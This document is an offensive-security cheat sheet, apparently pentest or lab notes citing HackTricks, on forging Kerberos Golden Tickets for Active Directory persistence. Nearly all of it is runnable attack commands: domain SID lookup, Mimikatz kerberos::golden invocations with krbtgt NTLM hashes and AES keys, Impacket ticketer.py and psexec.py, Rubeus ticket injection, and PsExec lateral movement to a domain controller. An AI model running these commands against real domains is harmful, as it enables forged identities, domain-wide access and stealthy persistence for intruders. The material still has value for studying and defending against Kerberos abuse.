Persistence
Golden Ticket
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket
A valid TGT as any user can be created using the NTLM hash of the krbtgt AD account. The advantage of forging a TGT instead of TGS is being able to access any service (or machine) in the domain and the impersonated user.
# Find domain SID.
whoami /user # Need to be logged in as a user and not nt authority\system
# Or use PowerView.ps1
Get-DomainSID
# EXAMPLE 1
# Use mimikatz to generate a golden ticket
mimikatz # privilege::debug
mimikatz # kerberos::golden /user:alice /domain:svcorp.com /sid:S-1-5-21-466546139-763938477-1796994327 /target:sv-file01.svcorp.com /service:HTTP /rc4:7f004ce6b8f7b2a3b6c477806799b9c0 /ptt
# EXAMPLE 2
#mimikatz
kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist #List tickets in memory
# EXAMPLE 3
# Example using aes key
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi
# EXAMPLE 4
# Linux - impacket
python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass
# With the golden ticket injected into memory, we can launch a new command prompt with
misc::cmd and again attempt lateral movement with PsExec.
psexec.exe \\dc01 cmd.exe
